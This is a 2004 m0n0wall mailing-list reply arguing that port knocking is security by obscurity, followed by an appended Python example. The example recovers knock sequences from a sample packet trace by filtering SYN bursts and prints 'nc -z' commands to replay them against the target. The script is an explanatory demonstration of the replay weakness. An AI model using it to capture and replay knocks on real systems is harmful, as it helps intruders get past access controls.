 From:  Bart Smit <bit at pipe dot nl>
 To:  Adam Nellemann <adam at nellemann dot nu>
 Cc:  "m0n0wall at lists dot m0n0 dot ch" <m0n0wall at lists dot m0n0 dot ch>
 Subject:  Re: [m0n0wall] Port Knocking?
 Date:  Sun, 08 Feb 2004 01:59:15 +0100
Adam Nellemann wrote:

 > How would you go about "trivally sniffing" a seemingly random sequence
 > of packets, bound for various ports on the "target" box?

By filtering on IP packets with the SYN flag set, in short succession, 
to the same destination address?

I bet you've never seen ethereal. Go on. Download it. Play with it.

 > Bearing in mind
 > that any reasonably intelligent "knocking client" would intersperse
 > the real "knocks" with various bogus packets for ports not part of the
 > list of "knocker ports" (which would be, at least initially,
 > unknown to the hacker), in addition to various other presented schemes
 > to further
 > "obfuscate" the knocking sequence (such as time-stamping etc.)

So what? None of this is immune to a simple replay. Not that you can't
think of even more secret tricks to circumvent *that* (go on, take a
hash of the source IP so all the ports and times change! that'll keep
you safe until someone reverse engineers m0n0wall and figures out the
hash).

I didn't say you can't think of ways to make it even more obscure!

Now I've said the word. Obscure. Security by obscurity has the obvious 
advantage that you can keep making it stronger all the time. ;-)

 > Personally, I still think it a nice feature for m0n0wall.

It's ridiculous.

Exactly because you consider yourself a "home user" (I think that you 
mean that in the sense of "relatively unsophisticated") you'd better 
rely on strong authentication and encryption methods instead of trying 
to come up with a supposedly "difficult to crack" port knocking scheme, 
which you have no way of assessing the safety of.

Let me answer the last one for you: you must assume that it's only safe 
against the most casual type of attack. Not the stuff a vendor would or 
should include in a firewall product.

--B
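[Added example, not part of the original message or of m0n0wall.] The filter Bart describes ("SYN flag set, in short succession, to the same destination address") is a few lines of code once you have a trace. The script below runs that filter over a constructed packet list standing in for an ethereal/tcpdump capture, cuts each (source, destination) pair's bare SYNs into bursts at quiet gaps, and treats every burst as a candidate knock sequence. Decoy ports do not help: the burst is recovered decoys and all, and a verbatim replay of it reproduces the real knock as a subsequence. The packet records, addresses, ports and the 2-second gap are all assumptions made for the example; the replay helper emits ordinary `nc -z -w 1 host port` connect attempts.

```python
"""Recover candidate port-knock sequences from a packet trace (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

SYN = 0x02
ACK = 0x10


@dataclass(frozen=True)
class Packet:
    ts: float     # capture time in seconds
    src: str
    dst: str
    dport: int
    flags: int    # TCP flag bits


# Constructed sample trace (assumption, not a real capture): one knocking
# client sends a decoy-laden sequence and then connects to port 22; the
# server answers with SYN/ACK; an unrelated host hits port 80; much later the
# same client opens a single, unrelated connection.
SAMPLE_TRACE = [
    Packet(100.00, "10.0.0.5", "192.0.2.1", 7000, SYN),
    Packet(100.20, "10.0.0.5", "192.0.2.1", 4321, SYN),        # decoy
    Packet(100.40, "10.0.0.5", "192.0.2.1", 8000, SYN),
    Packet(100.60, "10.0.0.5", "192.0.2.1", 9000, SYN),
    Packet(100.75, "10.0.0.5", "192.0.2.1", 1111, SYN),        # decoy
    Packet(101.00, "10.0.0.5", "192.0.2.1", 22, SYN),          # the real login
    Packet(101.05, "192.0.2.1", "10.0.0.5", 51000, SYN | ACK), # server reply
    Packet(150.00, "10.0.0.9", "192.0.2.1", 80, SYN),          # unrelated web hit
    Packet(300.00, "10.0.0.5", "192.0.2.1", 443, SYN),         # separate burst
]


def is_connection_attempt(p: Packet) -> bool:
    """Bare SYN only: the first packet of a handshake, not the SYN/ACK reply."""
    return bool(p.flags & SYN) and not (p.flags & ACK)


def extract_bursts(trace: Iterable[Packet], gap: float = 2.0,
                   min_len: int = 3) -> Dict[Tuple[str, str], List[List[int]]]:
    """Group bare SYNs per (src, dst) and split them into bursts wherever two
    consecutive SYNs are more than `gap` seconds apart.  Bursts shorter than
    `min_len` (stray connections, single scans) are dropped.  Returns
    {(src, dst): [[dport, ...], ...]} in capture order, decoys included."""
    flows: Dict[Tuple[str, str], List[Packet]] = defaultdict(list)
    for p in sorted(trace, key=lambda pkt: pkt.ts):
        if is_connection_attempt(p):
            flows[(p.src, p.dst)].append(p)

    result: Dict[Tuple[str, str], List[List[int]]] = {}
    for key, pkts in flows.items():
        bursts: List[List[Packet]] = []
        current = [pkts[0]]
        for prev, p in zip(pkts, pkts[1:]):
            if p.ts - prev.ts > gap:
                bursts.append(current)
                current = [p]
            else:
                current.append(p)
        bursts.append(current)
        seqs = [[p.dport for p in b] for b in bursts if len(b) >= min_len]
        if seqs:
            result[key] = seqs
    return result


def contains_knock(burst: List[int], secret: List[int]) -> bool:
    """True if `secret` occurs in order inside `burst`, with any number of
    decoy ports interleaved.  A verbatim replay of `burst` therefore also
    delivers the secret knock, whatever the decoys were."""
    it = iter(burst)
    return all(any(port == want for port in it) for want in secret)


def replay_commands(burst: List[int], dst: str) -> List[str]:
    """Shell lines that resend the captured burst as zero-I/O connects."""
    return [f"nc -z -w 1 {dst} {port}" for port in burst]


if __name__ == "__main__":
    for (src, dst), seqs in extract_bursts(SAMPLE_TRACE).items():
        for seq in seqs:
            print(f"{src} -> {dst}: {seq}")
            print("\n".join(replay_commands(seq, dst)))
```

Run it as-is and the only burst that survives is the client's six-port sequence; `contains_knock` confirms that the (assumed) real knock 7000, 8000, 9000 sits inside it, and `replay_commands` is the whole attack. Timestamp- or source-IP-dependent variants change which ports appear, not the fact that the captured burst can be resent.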